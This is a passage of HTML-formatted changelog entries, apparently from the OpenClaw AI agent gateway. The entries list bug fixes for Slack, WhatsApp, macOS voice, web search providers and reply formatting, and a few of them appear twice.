<p>Heartbeat: strip legacy <code>[TOOL_CALL]...[/TOOL_CALL]</code> and <code>[TOOL_RESULT]...[/TOOL_RESULT]</code> pseudo-call blocks from heartbeat replies before channel delivery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131762668" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54138" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54138/hovercard" href="https://github.com/openclaw/openclaw/issues/54138">#54138</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Deniable9570/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Deniable9570">@Deniable9570</a>.</p>
</li>
<li>
<p>macOS/Voice Wake: send wake-word and Push-to-Talk transcripts through the selected macOS session target instead of always falling back to main WebChat. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4107671050" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51040" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51040/hovercard" href="https://github.com/openclaw/openclaw/issues/51040">#51040</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/carl-jeffrolc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/carl-jeffrolc">@carl-jeffrolc</a>.</p>
</li>
<li>
<p>Providers/xAI: give Grok <code>web_search</code> a 60s default timeout, harden malformed xAI Responses parsing, and return structured timeout errors instead of aborting the tool call. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175237199" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58063" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58063/hovercard" href="https://github.com/openclaw/openclaw/issues/58063">#58063</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4183930735" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58733" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58733/hovercard" href="https://github.com/openclaw/openclaw/issues/58733">#58733</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dnishimura/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dnishimura">@dnishimura</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/marvcasasola-svg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/marvcasasola-svg">@marvcasasola-svg</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nanako0129/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nanako0129">@Nanako0129</a>.</p>
</li>
<li>
<p>Providers/configure: preserve the existing default model when adding or reauthing a provider whose plugin returns a default-model config patch. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4099627324" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50268" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50268/hovercard" href="https://github.com/openclaw/openclaw/issues/50268">#50268</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rixcorp-oc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rixcorp-oc">@rixcorp-oc</a>.</p>
</li>
<li>
<p>Slack/message actions: send media before the follow-up Block Kit message when Slack <code>send</code> includes a file plus presentation or interactive controls, so file attachments are no longer rejected. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4111591995" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51458" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51458/hovercard" href="https://github.com/openclaw/openclaw/issues/51458">#51458</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HirokiKobayashi-R/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HirokiKobayashi-R">@HirokiKobayashi-R</a>.</p>
</li>
<li>
<p>Slack/DMs: honor <code>dmHistoryLimit</code> for fresh 1:1 Slack DM sessions by backfilling recent conversation history before the current reply. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4240708914" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64427" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64427/hovercard" href="https://github.com/openclaw/openclaw/issues/64427">#64427</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brantley-creator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brantley-creator">@brantley-creator</a>.</p>
</li>
<li>
<p>Slack/DMs: keep top-level direct messages on the stable DM session even when <code>replyToMode</code> targets Slack thread replies, preserving context across DM turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4184870759" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58832" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58832/hovercard" href="https://github.com/openclaw/openclaw/issues/58832">#58832</a>. Thanks @daye-jjeong.</p>
</li>
<li>
<p>Slack/delivery: preserve Slack Web API missing-scope details in outbound delivery errors, so queued retry state identifies the OAuth scope to add. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4216375787" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62391" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62391/hovercard" href="https://github.com/openclaw/openclaw/issues/62391">#62391</a>. Thanks @alexey-pelykh.</p>
</li>
<li>
<p>Slack/capabilities: read granted scopes from <code>auth.test</code> response metadata before trying legacy scope APIs, so modern bot tokens no longer report <code>unknown_method</code> for channel capabilities. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4068646797" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44625" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44625/hovercard" href="https://github.com/openclaw/openclaw/issues/44625">#44625</a>. Thanks @Qquanwei and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</p>
</li>
<li>
<p>Slack/DMs: send text/block-only proactive DMs directly with <code>chat.postMessage(channel=&lt;user id&gt;)</code> while keeping conversation resolution for uploads and threaded sends. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4213098355" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62042" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62042/hovercard" href="https://github.com/openclaw/openclaw/issues/62042">#62042</a>. Thanks @MarkMolina.</p>
</li>
<li>
<p>Slack/routing: match route bindings written with Slack target syntax such as <code>channel:C...</code>, <code>user:U...</code>, or <code>&lt;@U...&gt;</code>, so bound Slack peers route to the configured agent instead of <code>main</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4048907648" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41608" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41608/hovercard" href="https://github.com/openclaw/openclaw/issues/41608">#41608</a>. Thanks @Winnsolutionsadmin.</p>
</li>
<li>
<p>Slack/routing: match public-channel allowlist entries written as <code>channel:C...</code> against bare Slack runtime channel IDs, so allowed channel mentions do not fail as <code>channel-not-allowed</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4046643845" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41264" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41264/hovercard" href="https://github.com/openclaw/openclaw/issues/41264">#41264</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4160915756" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56530" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/56530/hovercard" href="https://github.com/openclaw/openclaw/pull/56530">#56530</a>. Thanks @babutree and @Realworld404.</p>
</li>
<li>
<p>Slack/message actions: prefer the account bound to the outbound target peer before falling back to the agent's first channel account, so multi-workspace sends use the intended Slack account. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264751663" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66807" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66807/hovercard" href="https://github.com/openclaw/openclaw/pull/66807">#66807</a>. Thanks @rijhsinghani.</p>
</li>
<li>
<p>Slack/delivery: retry Slack Web API writes only when the SDK wraps a DNS request failure such as <code>EAI_AGAIN</code>, so transient resolver hiccups can recover without retrying platform errors that may duplicate messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289779783" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68789" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68789/hovercard" href="https://github.com/openclaw/openclaw/issues/68789">#68789</a>. Thanks @sonnyb9.</p>
</li>
<li>
<p>Slack/message actions: forward agent-scoped media roots through the bundled upload-file action path, so workspace files can be attached without failing the local-media guard. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4242973170" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64625" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64625/hovercard" href="https://github.com/openclaw/openclaw/issues/64625">#64625</a>. Thanks @benpchandler.</p>
</li>
<li>
<p>Slack/mentions: resolve <code>&lt;!subteam^...&gt;</code> user-group mentions through Slack <code>usergroups.users.list</code> and treat them as explicit mentions only when the bot user is a member, so mention-gated agent channels wake for real user-group mentions without config-only allowlists. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346503795" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73827" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73827/hovercard" href="https://github.com/openclaw/openclaw/issues/73827">#73827</a>. Thanks @CG-Intelligence-Agent-Jack.</p>
</li>
<li>
<p>Slack/message tool: let <code>read</code> fetch an exact Slack message timestamp, including a specific thread reply when paired with <code>threadId</code>, instead of returning only the parent thread or recent channel history. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4130437054" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53943" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53943/hovercard" href="https://github.com/openclaw/openclaw/issues/53943">#53943</a>. Thanks @zomars.</p>
</li>
<li>
<p>PDF/Gemini: send native PDF analysis API keys in the <code>x-goog-api-key</code> header instead of the request URL, keeping secrets out of proxy and access logs. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4202693803" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60600" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60600/hovercard" href="https://github.com/openclaw/openclaw/pull/60600">#60600</a>. Thanks @garagon.</p>
</li>
<li>
<p>Web search/Gemini: route agent abort signals into provider fetches and log provider-side abort failures as normal tool errors instead of silently aborting the run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338236726" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72995" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72995/hovercard" href="https://github.com/openclaw/openclaw/issues/72995">#72995</a>. Thanks @RoseKongPS.</p>
</li>
<li>
<p>Web search: point missing-key errors to <code>web_fetch</code> for known URLs and the browser tool for interactive pages. Thanks @zhaoyang97.</p>
</li>
<li>
<p>Web search: late-bind managed agent <code>web_search</code> calls to the current runtime config snapshot, so existing sessions do not keep stale unresolved SecretRefs after secrets reload. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362762607" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75420" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75420/hovercard" href="https://github.com/openclaw/openclaw/issues/75420">#75420</a>. Thanks @richardmqq.</p>
</li>
<li>
<p>Web search/Gemini: reuse <code>models.providers.google.apiKey</code> and <code>models.providers.google.baseUrl</code> as lower-priority fallbacks for Gemini web search after dedicated search config and <code>GEMINI_API_KEY</code>. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4167524438" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57496" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/57496/hovercard" href="https://github.com/openclaw/openclaw/pull/57496">#57496</a>. Thanks @Aoiujz.</p>
</li>
<li>
<p>Web search/Gemini: pass <code>freshness</code> and <code>date_after</code>/<code>date_before</code> filters through Google Search grounding time ranges. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4261488656" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66498" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66498/hovercard" href="https://github.com/openclaw/openclaw/issues/66498">#66498</a>. Thanks @ismael-81.</p>
</li>
<li>
<p>Web search/DuckDuckGo: include the keyless DuckDuckGo provider in the web search setup wizard. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4253504720" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65862" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65862/hovercard" href="https://github.com/openclaw/openclaw/issues/65862">#65862</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4254540581" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65940" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65940/hovercard" href="https://github.com/openclaw/openclaw/pull/65940">#65940</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jah-yee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jah-yee">@Jah-yee</a>.</p>
</li>
<li>
<p>Web search: honor <code>baseUrl</code> overrides for Gemini, Grok, and x_search provider-owned config, so proxy-backed search tools no longer dial hardcoded public endpoints. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4212565688" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61972" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61972/hovercard" href="https://github.com/openclaw/openclaw/pull/61972">#61972</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lanfei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lanfei">@Lanfei</a>.</p>
</li>
<li>
<p>Web search/Brave: point Brave provider metadata at the canonical <code>/tools/brave-search</code> docs page and make the legacy <code>/brave-search</code> docs page a redirect stub. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4253527816" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65870" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65870/hovercard" href="https://github.com/openclaw/openclaw/issues/65870">#65870</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4253794124" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65892" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65892/hovercard" href="https://github.com/openclaw/openclaw/pull/65892">#65892</a>. Thanks @Magicray1217 and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jah-yee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jah-yee">@Jah-yee</a>.</p>
</li>
<li>
<p>Web search/Brave: allow <code>freshness</code> and bounded date ranges in <code>llm-context</code> mode, matching Brave's documented LLM Context API support. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4107380876" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51005" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/51005/hovercard" href="https://github.com/openclaw/openclaw/pull/51005">#51005</a>. Thanks @remusao.</p>
</li>
<li>
<p>Web fetch: resolve external plugin <code>webFetchProviders</code> for non-sandboxed <code>web_fetch</code>, while keeping sandboxed fetches limited to bundled providers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355873723" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74915" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74915/hovercard" href="https://github.com/openclaw/openclaw/issues/74915">#74915</a>. Thanks @ultrahighsuper and @mingmingtsao.</p>
</li>
<li>
<p>Heartbeat: strip legacy <code>[TOOL_CALL]...[/TOOL_CALL]</code> and <code>[TOOL_RESULT]...[/TOOL_RESULT]</code> pseudo-call blocks from heartbeat replies before channel delivery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131762668" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54138" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54138/hovercard" href="https://github.com/openclaw/openclaw/issues/54138">#54138</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Deniable9570/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Deniable9570">@Deniable9570</a>.</p>
</li>
<li>
<p>macOS/Voice Wake: send wake-word and Push-to-Talk transcripts through the selected macOS session target instead of always falling back to main WebChat. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4107671050" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51040" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51040/hovercard" href="https://github.com/openclaw/openclaw/issues/51040">#51040</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/carl-jeffrolc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/carl-jeffrolc">@carl-jeffrolc</a>.</p>
</li>
<li>
<p>Providers/xAI: give Grok <code>web_search</code> a 60s default timeout, harden malformed xAI Responses parsing, and return structured timeout errors instead of aborting the tool call. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175237199" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58063" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58063/hovercard" href="https://github.com/openclaw/openclaw/issues/58063">#58063</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4183930735" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58733" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58733/hovercard" href="https://github.com/openclaw/openclaw/issues/58733">#58733</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dnishimura/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dnishimura">@dnishimura</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/marvcasasola-svg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/marvcasasola-svg">@marvcasasola-svg</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nanako0129/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nanako0129">@Nanako0129</a>.</p>
</li>
<li>
<p>Slack/directory: make <code>openclaw directory peers/groups list --channel slack</code> prefer token-backed live readers and return the connected Slack account from <code>directory self</code>, so valid Slack tokens no longer produce empty directory CLI results. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4105363396" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50776" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50776/hovercard" href="https://github.com/openclaw/openclaw/issues/50776">#50776</a>. Thanks @pjaillon.</p>
</li>
<li>
<p>Slack: keep assistant typing status, temporary typing reactions, and status reactions active for group/channel turns that use message-tool-only visible replies, while still suppressing automatic source replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367334076" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75877" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75877/hovercard" href="https://github.com/openclaw/openclaw/issues/75877">#75877</a>. Thanks @teosborne.</p>
</li>
<li>
<p>Slack: recover full inbound DM text from top-level rich-text blocks when Slack sends a shortened message preview, so long direct messages still reach the agent intact. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4147105482" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55358" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55358/hovercard" href="https://github.com/openclaw/openclaw/issues/55358">#55358</a>. Thanks @tonyjwinter.</p>
</li>
<li>
<p>Replies: strip legacy <code>[TOOL_CALL]{tool =&gt; ..., args =&gt; ...}[/TOOL_CALL]</code> pseudo-call text from user-facing replies and flag it in tool-call diagnostics instead of showing raw tool syntax in channels. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4230337239" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63610" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63610/hovercard" href="https://github.com/openclaw/openclaw/issues/63610">#63610</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/canh0chua/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/canh0chua">@canh0chua</a>.</p>
</li>
<li>
<p>WhatsApp: close long-lived web sockets through Baileys <code>end(error)</code> before falling back to raw websocket close, so listener teardown runs Baileys cleanup instead of leaving zombie sockets. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4116852446" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52442" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52442/hovercard" href="https://github.com/openclaw/openclaw/issues/52442">#52442</a>. Thanks @essendigitalgroup-cyber.</p>
</li>
<li>
<p>Twitch/plugins: emit a flat JSON Schema for Twitch channel config so single-account and multi-account configs validate before runtime load, and add source-checkout diagnostics for missing pnpm workspace dependencies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/sessions: move hot transcript reads and mirror appends onto async bounded IO with serialized parent-linked writes, keeping large session histories from stalling Gateway requests and channel replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364571913" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75656" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75656/hovercard" href="https://github.com/openclaw/openclaw/issues/75656">#75656</a>. Thanks @DerFlash.</p>
</li>
<li>
<p>macOS/Talk Mode: downmix multi-channel microphone buffers before handing them to Apple Speech across Push-to-Talk, Talk Mode, Voice Wake, and the wake-word tester, so pro audio interfaces no longer produce empty transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4054504623" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42533" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42533/hovercard" href="https://github.com/openclaw/openclaw/issues/42533">#42533</a>. Thanks @jbuecker.</p>
</li>
<li>
<p>macOS/Talk Mode: subscribe native WebChat to active-session transcript updates and render external spoken user turns in the chat thread instead of only showing assistant replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359538657" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75155" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75155/hovercard" href="https://github.com/openclaw/openclaw/issues/75155">#75155</a>. Thanks @SledderBling.</p>
</li>
<li>
<p>macOS/Voice Wake: accept trigger-only phrases in the built-in Voice Wake test, matching the settings UI and runtime trigger-only path instead of requiring extra command text after the wake word. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245638367" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64986" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64986/hovercard" href="https://github.com/openclaw/openclaw/issues/64986">#64986</a>. Thanks @zoiks65.</p>
</li>
<li>
<p>Cron/TTS: run cron announce payloads through the normal TTS directive transform before outbound delivery, so scheduled <code>[[tts]]</code> replies generate voice payloads instead of leaking raw tags. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115170457" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52125" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52125/hovercard" href="https://github.com/openclaw/openclaw/issues/52125">#52125</a>. Thanks @kenchen3000.</p>
</li>
<li>
<p>WhatsApp: save downloadable quoted image media from reply context as inbound media, so agents can inspect an image that a user replied to instead of only seeing <code>&lt;media:image&gt;</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4188698212" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59174" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59174/hovercard" href="https://github.com/openclaw/openclaw/issues/59174">#59174</a>. Thanks @gaffner.</p>
</li>
<li>
<p>Sessions/store: stop persisting the runtime-only <code>skillsSnapshot.resolvedSkills</code> array inside each session entry, so <code>sessions.json</code> no longer carries a copy of every parsed <code>SKILL.md</code> body for every active session; <code>ensureSkillSnapshot</code> rehydrates the array from disk on cold resume so the embedded runner, the Claude CLI skills plugin, and the Claude live-session fingerprint all see populated skills, and legacy stores self-heal on the next save. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3913009724" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/11950" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/11950/hovercard" href="https://github.com/openclaw/openclaw/issues/11950">#11950</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3883150285" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/6650" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/6650/hovercard" href="https://github.com/openclaw/openclaw/issues/6650">#6650</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3934112753" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/15000" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/15000/hovercard" href="https://github.com/openclaw/openclaw/issues/15000">#15000</a>. Thanks @amoghasgekar.</p>
</li>
<li>
<p>Doctor/WhatsApp: warn when Linux crontabs still run the legacy <code>ensure-whatsapp.sh</code> health check, which can misreport <code>Gateway inactive</code> when cron lacks the systemd user-bus environment. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4199567980" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60204" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60204/hovercard" href="https://github.com/openclaw/openclaw/issues/60204">#60204</a>. Thanks @mySebbe.</p>
</li>
<li>
<p>Slack/setup: print the generated app manifest as plain JSON instead of embedding it inside the framed setup note, so it can be copied into Slack without deleting border characters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251790246" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65751" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65751/hovercard" href="https://github.com/openclaw/openclaw/issues/65751">#65751</a>. Thanks @theDanielJLewis.</p>
</li>
<li>
<p>Channels/WhatsApp: route CLI logout through the live Gateway and stop runtime-backed listeners before channel removal, so removing a WhatsApp account does not leave the old socket replying until restart. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4277177561" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67746" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67746/hovercard" href="https://github.com/openclaw/openclaw/issues/67746">#67746</a>. Thanks @123Mismail.</p>
</li>
<li>
<p>Voice Call/Twilio: honor TTS directive text and provider voice/model overrides during telephony synthesis, so <code>[[tts:...]]</code> tags are not spoken literally and voiceId overrides reach OpenAI/ElevenLabs calls. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175530255" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58114" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58114/hovercard" href="https://github.com/openclaw/openclaw/issues/58114">#58114</a>. Thanks @legonhilltech-jpg.</p>
</li>
<li>
